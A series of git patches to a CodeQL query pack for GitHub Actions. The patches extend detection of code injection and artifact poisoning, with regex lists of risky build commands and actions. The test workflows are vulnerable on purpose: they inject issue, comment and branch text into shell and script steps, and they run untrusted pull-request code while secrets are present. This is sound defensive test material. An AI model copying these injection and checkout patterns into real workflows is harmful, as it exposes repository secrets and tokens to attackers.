a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref new file mode 100644 index 000000000000..01235fb6a202 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrue.ql From 7a8af5e8ea1c5697dfff38ff5e4d0475f1fd038a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:19:35 +0200 Subject: [PATCH 203/707] Additional sources --- .../codeql/actions/dataflow/FlowSources.qll | 22 ++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c937aaa550b9..0dc376765a8a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -120,12 +120,30 @@ private predicate isExternalUserControlledWorkflowRun(string context) { "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } +bindingset[context] +private predicate isExternalUserControlledRepositoryDispatch(string context) { + exists(string reg | + reg = ["github\\.event\\.client_payload\\[[0-9]+\\]", "github\\.event\\.client_payload",] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + +bindingset[context] +private predicate isExternalUserControlledWorkflowDispatch(string context) { + exists(string reg | reg = ["github\\.event\\.inputs\\[[0-9]+\\]", "github\\.event\\.inputs",] | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + private class EventSource extends RemoteFlowSource { EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | @@ -137,7 +155,9 @@ private class EventSource extends RemoteFlowSource { isExternalUserControlledGollum(context) or isExternalUserControlledCommit(context) or isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) + isExternalUserControlledWorkflowRun(context) or + isExternalUserControlledRepositoryDispatch(context) or + isExternalUserControlledWorkflowDispatch(context) ) } From d504cd9b4d5c36ba1146d3b73acef52d801fad54 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:20:09 +0200 Subject: [PATCH 204/707] Better detection of poisonable steps --- .../security/ArtifactPoisoningQuery.qll | 53 ++++++- .../CWE-094/.github/workflows/level0.yml | 135 +++++++++++++++++ .../CWE-094/.github/workflows/level1.yml | 37 +++++ .../Security/CWE-094/CodeInjection.expected | 3 + .../CWE-094/PrivilegedCodeInjection.expected | 6 + .../.github/workflows/artifactpoisoning34.yml | 25 ++++ .../CWE-829/.github/workflows/level0.yml | 136 ++++++++++++++++++ .../.github/workflows/untrusted_checkout.yml | 7 + .../CWE-829/ArtifactPoisoning.expected | 3 + .../PrivilegedArtifactPoisoning.expected | 4 + .../CWE-829/UnpinnedActionsTag.expected | 1 + .../CWE-829/UntrustedCheckout.expected | 4 +- 12 files changed, 406 insertions(+), 8 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d5c1567f8a5d..95dc22a40def 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -230,16 +230,55 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { abstract class PoisonableStep extends Step { } -class CommandExecutionRunStep extends PoisonableStep, Run { - CommandExecutionRunStep() { +// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 +private string dangerousActions() { + result = + ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"] +} + +class DangerousActionUsesStep extends PoisonableStep, UsesStep { + DangerousActionUsesStep() { + exists(UntrustedArtifactDownloadStep step | + step.getAFollowingStep() = this and + this.getCallee() = dangerousActions() + ) + } +} + +// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 +private string dangerousCommands() { + result = + [ + "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", + "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", + "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", + "^ant ", "mkdocs build", "pytest" + ] +} + +class BuildRunStep extends PoisonableStep, Run { + BuildRunStep() { + exists(UntrustedArtifactDownloadStep step | + step.getAFollowingStep() = this and + exists( + this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) + ) + ) + } +} + +class LocalCommandExecutionRunStep extends PoisonableStep, Run { + LocalCommandExecutionRunStep() { exists(UntrustedArtifactDownloadStep step | step.getAFollowingStep() = this and // Heuristic: - // Run step with a command starting with `./xxxx`, `sh xxxx`, `node xxxx`, ... - // eg: `./test.sh`, `sh test.sh`, `node test.js`, ... - this.getScript() - .trim() - .regexpMatch(".*(./|(node|python|ruby|sh)\\s+)" + step.getPath() + ".*") + // Run step with a command starting with `./xxxx`, `sh xxxx`, ... + exists( + this.getScript() + .splitAt("\n") + .trim() + .regexpFind("([^a-z]|^)(./|(ba|z|fi)?sh\\s+)" + step.getPath(), _, _) + ) ) } } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml new file mode 100644 index 000000000000..ad9187a3d6bf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml @@ -0,0 +1,135 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml new file mode 100644 index 000000000000..826051dfc5ac --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml @@ -0,0 +1,37 @@ +name: Poutine Level 1 +on: + workflow_run: + workflows: ["Poutine Level 0"] + types: + - completed + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + toppings-for-realz: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'workflow_run' && github.event.workflow_run.event == 'pull_request' + permissions: + id-token: write + contents: write + pull-requests: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ: ${{ secrets.FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: actions/first-interaction@v1 + with: + repo-token: ${{ secrets.GITHUB_TOKEN }} + issue-message: 'Message that will be displayed on users first issue' + pr-message: 'Message that will be displayed on users first pr' + - name: Log test executions + run: | + echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index f242e0e9e689..785aaa383eb3 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -153,6 +153,9 @@ nodes | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index ec9a5e5238a9..5b2dac260ded 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -153,6 +153,9 @@ nodes | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -269,6 +272,9 @@ subpaths | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml new file mode 100644 index 000000000000..905a4eaccb17 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip foo/artifact_name.zip + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml new file mode 100644 index 000000000000..49908b7b4c51 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml @@ -0,0 +1,136 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 6bcdcbb4291c..1160497a4a38 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -13,3 +13,10 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 99f9fb0e5407..429a4cdc0c5b 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -6,6 +6,7 @@ edges | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | @@ -26,6 +27,8 @@ nodes | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index ca1fef5fa85e..ba635b1d74de 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected @@ -6,6 +6,7 @@ edges | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | @@ -26,6 +27,8 @@ nodes | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | @@ -45,6 +48,7 @@ subpaths | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Run Step | | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 7bee36029d6b..0ba7832e8e8f 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -13,4 +13,5 @@ | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | 